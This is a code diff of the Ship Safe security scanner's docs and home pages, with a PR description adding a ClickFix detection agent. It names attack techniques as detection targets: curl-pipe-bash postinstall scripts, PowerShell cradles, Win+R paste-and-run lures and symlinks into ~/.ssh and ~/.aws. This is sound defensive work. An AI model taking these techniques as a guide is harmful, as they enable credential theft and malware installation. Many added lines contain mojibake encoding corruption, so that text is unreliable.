+                    <tr><td><code>agent .</code></td><td>Interactive fix loop: scan Ã¢ÂÂ plan Ã¢ÂÂ diff Ã¢ÂÂ accept/skip/edit/quit Ã¢ÂÂ verify</td></tr>
                     <tr><td><code>agent . --plan-only</code></td><td>Preview fix plans without writing any files</td></tr>
                     <tr><td><code>agent . --severity critical</code></td><td>Only plan/fix findings at the given severity or above</td></tr>
                     <tr><td><code>agent . --branch --pr</code></td><td>Commit fixes on a new branch and open a PR via <code>gh</code></td></tr>
-                    <tr><td><code>agent . --yolo --branch</code></td><td>Unattended CI mode â auto-accept all plans</td></tr>
+                    <tr><td><code>agent . --yolo --branch</code></td><td>Unattended CI mode Ã¢ÂÂ auto-accept all plans</td></tr>
                     <tr><td><code>undo</code></td><td>Revert the last fix applied by the agent</td></tr>
                     <tr><td><code>undo --all</code></td><td>Revert every fix in <code>.ship-safe/fixes.jsonl</code></td></tr>
                   </tbody>
@@ -183,7 +183,7 @@ npx ship-safe ci . --threshold 80`}</code></pre>
                 <table>
                   <thead><tr><th>Command</th><th>Description</th></tr></thead>
                   <tbody>
-                    <tr><td><code>hooks install</code></td><td>Install real-time Claude Code hooks â block secrets before they land on disk</td></tr>
+                    <tr><td><code>hooks install</code></td><td>Install real-time Claude Code hooks Ã¢ÂÂ block secrets before they land on disk</td></tr>
                     <tr><td><code>hooks status</code></td><td>Check if Claude Code hooks are installed</td></tr>
                     <tr><td><code>hooks remove</code></td><td>Uninstall Claude Code hooks</td></tr>
                     <tr><td><code>remediate .</code></td><td>Auto-fix hardcoded secrets (rewrite code + write .env)</td></tr>
@@ -254,9 +254,9 @@ npx ship-safe ci . --threshold 80`}</code></pre>
               </div>
             </section>
 
-            {/* ââ Agents ââââââââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Agents Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="agents">
-              <h2>27 Security Agents</h2>
+              <h2>28 Security Agents</h2>
               <p>All agents run in parallel with per-agent timeouts. Each implements <code>shouldRun(recon)</code> to skip irrelevant projects automatically.</p>
               <div className={styles.tableWrap}>
                 <table>
@@ -281,21 +281,22 @@ npx ship-safe ci . --threshold 80`}</code></pre>
                     <tr><td><strong>GitHistoryScanner</strong></td><td>Secrets</td><td>Leaked secrets in git commit history</td></tr>
                     <tr><td><strong>CICDScanner</strong></td><td>CI/CD</td><td>OWASP CI/CD Top 10: pipeline poisoning, unpinned actions, secret logging</td></tr>
                     <tr><td><strong>APIFuzzer</strong></td><td>API</td><td>Routes without auth, mass assignment, GraphQL introspection, debug endpoints</td></tr>
-                    <tr><td><strong>ManagedAgentScanner</strong></td><td>AI/LLM</td><td>Claude Managed Agent misconfigs â always_allow policies, unrestricted networking, unpinned packages</td></tr>
-                    <tr><td><strong>HermesSecurityAgent</strong></td><td>AI/LLM</td><td>Hermes Agent deployments â tool registry poisoning, function-call injection, skill permission drift (ASI-01âASI-10)</td></tr>
-                    <tr><td><strong>AgentAttestationAgent</strong></td><td>Supply Chain</td><td>Agent manifest supply chain â unpinned versions, missing integrity hashes, unsigned manifests (ASI-10, SLSA Level 0)</td></tr>
-                    <tr><td><strong>AgenticSupplyChainAgent</strong></td><td>Supply Chain</td><td>AI integration supply chain â over-privileged AI CI actions, OAuth scope creep, unsigned AI webhook receivers (ASI-02, ASI-06, CICD-SEC-8)</td></tr>
-                    <tr><td><strong>RobloxSecurityAgent</strong></td><td>Supply Chain</td><td>Malicious Roblox/Luau Toolbox assets â runtime asset injection (<code>game:GetObjects(&apos;rbxassetid://&apos;)</code>, <code>require(assetId)</code>), <code>HttpEnabled</code> from scripts, obfuscated loaders, and payloads hidden in instance attributes (decoded from <code>.rbxmx</code>/<code>.rbxlx</code>) â plus cross-platform ClickFix paste-and-run lures (CWE-506, CWE-829)</td></tr>
-                    <tr><td><strong>ModelScanAgent</strong></td><td>Supply Chain</td><td>ML model supply chain â code-execution payloads in pickle-based weights (<code>.pt</code>/<code>.pkl</code>/<code>.ckpt</code>/<code>.bin</code>), <code>torch.load</code> without <code>weights_only=True</code>, and archive-wrapped scanner evasion (CWE-502, CWE-506)</td></tr>
-                    <tr><td><strong>TrustBoundaryAgent</strong></td><td>Agentic</td><td>AI coding-agent trust boundary â GhostApproval symlinks (config-named links into <code>~/.ssh</code>/<code>~/.aws</code>/<code>.env</code>), symlinks escaping the repo, and Friendly Fire run-on-review/curl-pipe-bash instructions in agent-read files (CWE-59, CWE-61)</td></tr>
-                    <tr><td><strong>SlopSquatAgent</strong></td><td>Supply Chain</td><td>Slopsquatting / hallucinated packages — imports that are neither declared in <code>package.json</code>, present in <code>node_modules</code>, nor Node builtins (the slot attackers register), plus documented AI-hallucinated names (CWE-1357)</td></tr>
+                    <tr><td><strong>ManagedAgentScanner</strong></td><td>AI/LLM</td><td>Claude Managed Agent misconfigs Ã¢ÂÂ always_allow policies, unrestricted networking, unpinned packages</td></tr>
+                    <tr><td><strong>HermesSecurityAgent</strong></td><td>AI/LLM</td><td>Hermes Agent deployments Ã¢ÂÂ tool registry poisoning, function-call injection, skill permission drift (ASI-01Ã¢ÂÂASI-10)</td></tr>
+                    <tr><td><strong>AgentAttestationAgent</strong></td><td>Supply Chain</td><td>Agent manifest supply chain Ã¢ÂÂ unpinned versions, missing integrity hashes, unsigned manifests (ASI-10, SLSA Level 0)</td></tr>
+                    <tr><td><strong>AgenticSupplyChainAgent</strong></td><td>Supply Chain</td><td>AI integration supply chain Ã¢ÂÂ over-privileged AI CI actions, OAuth scope creep, unsigned AI webhook receivers (ASI-02, ASI-06, CICD-SEC-8)</td></tr>
+                    <tr><td><strong>RobloxSecurityAgent</strong></td><td>Supply Chain</td><td>Malicious Roblox/Luau Toolbox assets Ã¢ÂÂ runtime asset injection (<code>game:GetObjects(&apos;rbxassetid://&apos;)</code>, <code>require(assetId)</code>), <code>HttpEnabled</code> from scripts, obfuscated loaders, and payloads hidden in instance attributes (decoded from <code>.rbxmx</code>/<code>.rbxlx</code>) Ã¢ÂÂ (CWE-506, CWE-829)</td></tr>
+                    <tr><td><strong>ModelScanAgent</strong></td><td>Supply Chain</td><td>ML model supply chain Ã¢ÂÂ code-execution payloads in pickle-based weights (<code>.pt</code>/<code>.pkl</code>/<code>.ckpt</code>/<code>.bin</code>), <code>torch.load</code> without <code>weights_only=True</code>, and archive-wrapped scanner evasion (CWE-502, CWE-506)</td></tr>
+                    <tr><td><strong>TrustBoundaryAgent</strong></td><td>Agentic</td><td>AI coding-agent trust boundary Ã¢ÂÂ GhostApproval symlinks (config-named links into <code>~/.ssh</code>/<code>~/.aws</code>/<code>.env</code>), symlinks escaping the repo, and Friendly Fire run-on-review/curl-pipe-bash instructions in agent-read files (CWE-59, CWE-61)</td></tr>
+                    <tr><td><strong>SlopSquatAgent</strong></td><td>Supply Chain</td><td>Slopsquatting / hallucinated packages â imports that are neither declared in <code>package.json</code>, present in <code>node_modules</code>, nor Node builtins (the slot attackers register), plus documented AI-hallucinated names (CWE-1357)</td></tr>
+                    <tr><td><strong>ClickFixAgent</strong></td><td>Supply Chain</td><td>ClickFix / fake-CAPTCHA paste-and-run social engineering — fake error framing next to Win+R/Ctrl+V/command-bar keystrokes and PowerShell cradles, plus fake-installer <code>preinstall</code>/<code>postinstall</code> scripts (CWE-1357, CWE-506)</td></tr>
                   </tbody>
                 </table>
               </div>
               <p><strong>Post-processors:</strong> ScoringEngine (8-category weighted scoring), VerifierAgent (secrets liveness verification), DeepAnalyzer (LLM-powered taint analysis)</p>
             </section>
 
-            {/* ââ Scoring âââââââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Scoring Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="scoring">
               <h2>Scoring System</h2>
               <p>Starts at 100. Each finding deducts points by severity and category, weighted by confidence level (high: 100%, medium: 60%, low: 30%).</p>
@@ -318,7 +319,7 @@ npx ship-safe ci . --threshold 80`}</code></pre>
               <p><strong>Exit codes:</strong> <code>0</code> for A/B (&gt;= 75), <code>1</code> for C/D/F. Use in CI to fail builds.</p>
             </section>
 
-            {/* ââ CI/CD âââââââââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ CI/CD Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="cicd">
               <h2>CI/CD Integration</h2>
               <pre><code>{`# Basic CI: fail if score < 75
@@ -338,7 +339,7 @@ npx ship-safe ci . --baseline`}</code></pre>
               <p>Export formats: <code>--json</code>, <code>--sarif</code>, <code>--csv</code>, <code>--md</code>, <code>--html</code>, <code>--pdf</code></p>
             </section>
 
-            {/* ââ GitHub Action ââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ GitHub Action Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="github-action">
               <h2>GitHub Action</h2>
               <pre><code>{`# .github/workflows/security.yml
@@ -379,7 +380,7 @@ jobs:
               </div>
             </section>
 
-            {/* ââ LLM âââââââââââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ LLM Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="llm">
               <h2>Multi-LLM Support</h2>
               <p>AI classification is optional. All core commands work fully offline. Use <code>--provider &lt;name&gt;</code> or set the matching environment variable.</p>
@@ -404,7 +405,7 @@ jobs:
               </div>
             </section>
 
-            {/* ââ Incremental Scanning ââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Incremental Scanning Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="scanning">
               <h2>Incremental Scanning</h2>
               <p>Ship Safe caches file hashes and findings in <code>.ship-safe/context.json</code>. Only changed files are re-scanned on subsequent runs.</p>
@@ -416,7 +417,7 @@ jobs:
               <p>LLM responses are cached in <code>.ship-safe/llm-cache.json</code> with a 7-day TTL to reduce API costs.</p>
             </section>
 
-            {/* ââ Suppression âââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Suppression Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="suppression">
               <h2>Suppressing Findings</h2>
               <p><strong>Inline:</strong> Add <code># ship-safe-ignore</code> on any line:</p>
@@ -430,7 +431,7 @@ tests/fixtures/
 docs/`}</code></pre>
             </section>
 
-            {/* ââ Policy ââââââââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Policy Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="policy">
               <h2>Policy-as-Code</h2>
               <pre><code>{`npx ship-safe policy init`}</code></pre>
@@ -444,7 +445,7 @@ docs/`}</code></pre>
 }`}</code></pre>
             </section>
 
-            {/* ââ OWASP âââââââââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ OWASP Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="owasp">
               <h2>OWASP Coverage</h2>
               <div className={styles.tableWrap}>
@@ -462,7 +463,7 @@ docs/`}</code></pre>
               <p>Compliance mapping to SOC 2 Type II, ISO 27001:2022, and NIST AI RMF is included in audit reports.</p>
             </section>
 
-            {/* ââ OpenClaw ââââââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ OpenClaw Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="openclaw">
               <h2>OpenClaw Security</h2>
               <pre><code>{`# Focused OpenClaw security scan
@@ -514,7 +515,7 @@ jobs:
               <p>Scans <code>openclaw.json</code>, <code>.cursorrules</code>, <code>CLAUDE.md</code>, Claude Code hooks, and MCP configs. Checks against the bundled threat intelligence database for known ClawHavoc IOCs.</p>
             </section>
 
-            {/* ââ Claude Code âââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Claude Code Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="claude-code">
               <h2>Claude Code Plugin</h2>
               <pre><code>{`claude plugin add github:asamassekou10/ship-safe`}</code></pre>
@@ -532,7 +533,7 @@ jobs:
               </div>
             </section>
 
-            {/* ââ Config Files ââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Config Files Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="config">
               <h2>Configuration Files</h2>
               <div className={styles.tableWrap}>
@@ -546,14 +547,14 @@ jobs:
                     <tr><td><code>.ship-safe/baseline.json</code></td><td>Accepted findings baseline</td></tr>
                     <tr><td><code>.ship-safe/llm-cache.json</code></td><td>LLM response cache (7-day TTL)</td></tr>
                     <tr><td><code>.ship-safe/fixes.jsonl</code></td><td>Log of every fix applied by <code>agent</code> (used by <code>undo</code>)</td></tr>
-                    <tr><td><code>.ship-safe/failures.jsonl</code></td><td>Plans that failed to apply â parse errors, declined plans, provider errors</td></tr>
+                    <tr><td><code>.ship-safe/failures.jsonl</code></td><td>Plans that failed to apply Ã¢ÂÂ parse errors, declined plans, provider errors</td></tr>
                   </tbody>
                 </table>
               </div>
               <p>The <code>.ship-safe/</code> directory is automatically excluded from scans and should be added to <code>.gitignore</code>.</p>
             </section>
 
-            {/* ââ Supply Chain ââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Supply Chain Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="supply-chain">
               <h2>Supply Chain Hardening</h2>
               <p>Ship Safe practices what it preaches. Our own supply chain is hardened against the <a href="/blog/supply-chain-attacks-2026-how-we-hardened-ship-safe">2026 Trivy/CanisterWorm attack chain</a>:</p>

--- a/webapp/app/page.tsx
+++ b/webapp/app/page.tsx
@@ -8,14 +8,14 @@ const ogImage = 'https://www.shipsafecli.com/og1.png';
 
 export const metadata: Metadata = {
   title: 'Ship Safe — AI Agent Security Scanner for Developers',
-  description: '27 AI security agents scan your codebase for LLM vulnerabilities, MCP configuration security issues, RAG poisoning, Claude Managed Agent misconfigs, secrets, and dependency CVEs. OWASP Agentic AI Top 10 mapping, live advisory feeds. Free CLI.',
+  description: '28 AI security agents scan your codebase for LLM vulnerabilities, MCP configuration security issues, RAG poisoning, Claude Managed Agent misconfigs, secrets, and dependency CVEs. OWASP Agentic AI Top 10 mapping, live advisory feeds. Free CLI.',
   keywords: ['AI agent security scanner', 'LLM vulnerability CLI', 'MCP configuration security', 'RAG poisoning prevention', 'prevent RAG poisoning', 'application security scanner', 'AI security agents', 'secret scanner', 'OWASP Agentic AI Top 10', 'memory poisoning detection', 'prompt injection scanner', 'DevSecOps tool', 'free security scanner', 'open source SAST'],
   alternates: {
     canonical: 'https://www.shipsafecli.com',
   },
   openGraph: {
     title: 'Ship Safe — AI Agent Security Scanner for Developers',
-    description: '27 AI security agents detect LLM vulnerabilities, MCP misconfigurations, RAG poisoning, secrets, and CVEs. One command. Free and open source.',
+    description: '28 AI security agents detect LLM vulnerabilities, MCP misconfigurations, RAG poisoning, secrets, and CVEs. One command. Free and open source.',
     type: 'website',
     url: 'https://www.shipsafecli.com',
     siteName: 'Ship Safe',
@@ -24,7 +24,7 @@ export const metadata: Metadata = {
   twitter: {
     card: 'summary_large_image',
     title: 'Ship Safe — AI Agent Security Scanner for Developers',
-    description: '27 AI security agents detect LLM vulnerabilities, MCP misconfigurations, RAG poisoning, secrets, and CVEs. One command. Free and open source.',
+    description: '28 AI security agents detect LLM vulnerabilities, MCP misconfigurations, RAG poisoning, secrets, and CVEs. One command. Free and open source.',
     images: [ogImage],
   },
 };
@@ -42,7 +42,7 @@ const jsonLd = {
         price: '0',
         priceCurrency: 'USD',
       },
-      description: '27 AI security agents scan your codebase for secrets, vulnerabilities, memory poisoning, Hermes Agent misconfigurations, and dependency CVEs in one command.',
+      description: '28 AI security agents scan your codebase for secrets, vulnerabilities, memory poisoning, Hermes Agent misconfigurations, and dependency CVEs in one command.',
       url: 'https://www.shipsafecli.com',
       downloadUrl: 'https://www.npmjs.com/package/ship-safe',
       softwareVersion: '9.4.1',

--- a/webapp/components/Hero.tsx
+++ b/webapp/components/Hero.tsx
@@ -213,7 +213,7 @@ export default function Hero({ stars, downloads }: Props) {
               className={styles.tabular}
               title={`${formatNumber(stars)} stars · ${formatNumber(downloads)} downloads`}
             >
-              27 agents
+              28 agents
             </span>
           </motion.div>
 

--- a/webapp/components/HomeRedesign.tsx
+++ b/webapp/components/HomeRedesign.tsx
@@ -32,7 +32,7 @@ const coverage = [
 
 const proofItems = [
   { value: 'MIT', label: 'open-source CLI' },
-  { value: '27', label: 'specialized agents' },
+  { value: '28', label: 'specialized agents' },
   { value: 'SARIF', label: 'GitHub-ready output' },
   { value: 'CI', label: 'pipeline gating' },
 ];
@@ -352,7 +352,7 @@ export default function HomeRedesign({ stars, downloads }: HomeRedesignProps) {
           <span>npm downloads</span>
         </div>
         <div>
-          <strong>27</strong>
+          <strong>28</strong>
           <span>AI security agents</span>
         </div>
         <div>


### PR DESCRIPTION
Final P0 agent of the **v9.5.0 "Trust Boundary"** line. ClickFix (fake-error / fake-CAPTCHA "paste this to fix it") surged ~517% and is now aimed at developers — a malicious npm package posed as an OpenClaw installer in March 2026. The detector existed but was buried inside RobloxSecurityAgent; this promotes it to a standalone, broadened, cross-platform agent.

## What changed
- **New `ClickFixAgent`** runs over docs, HTML, source, and shell/PowerShell files, plus npm lifecycle scripts.
- **Removed** the ClickFix rule (and its 2 tests) from `RobloxSecurityAgent` — no double-reporting. Roblox-specific coverage is unchanged.

| Rule | Catches | Severity |
|---|---|---|
| `CLICKFIX_PASTE_RUN` | Fake error/CAPTCHA framing near a paste-and-run keystroke sequence (Ctrl+V, **Win+R**, command bar); confidence ↑ with a PowerShell cradle | High |
| `CLICKFIX_FAKE_INSTALLER` | npm `pre/postinstall` piping a remote fetch into a shell (OpenClaw-style fake installer) | High |

## False-positive discipline
Framing and action must co-occur within a window, so docs that merely say "Ctrl+C to copy" stay quiet, as does a normal `node ./scripts/build.js` postinstall (both tested).

## Verified
End-to-end: a Win+R lure README → `CLICKFIX_PASTE_RUN`, a `curl|bash` postinstall → `CLICKFIX_FAKE_INSTALLER`. **235 tests**, lint 0 errors, webapp tsc clean, orchestrator at **28 agents** (Roblox intact).

---
**This completes the v9.5.0 "Trust Boundary" P0 lane** — ModelScan (#43), TrustBoundary (#44), SlopSquat (#45), ClickFix (this). 24 → 28 agents.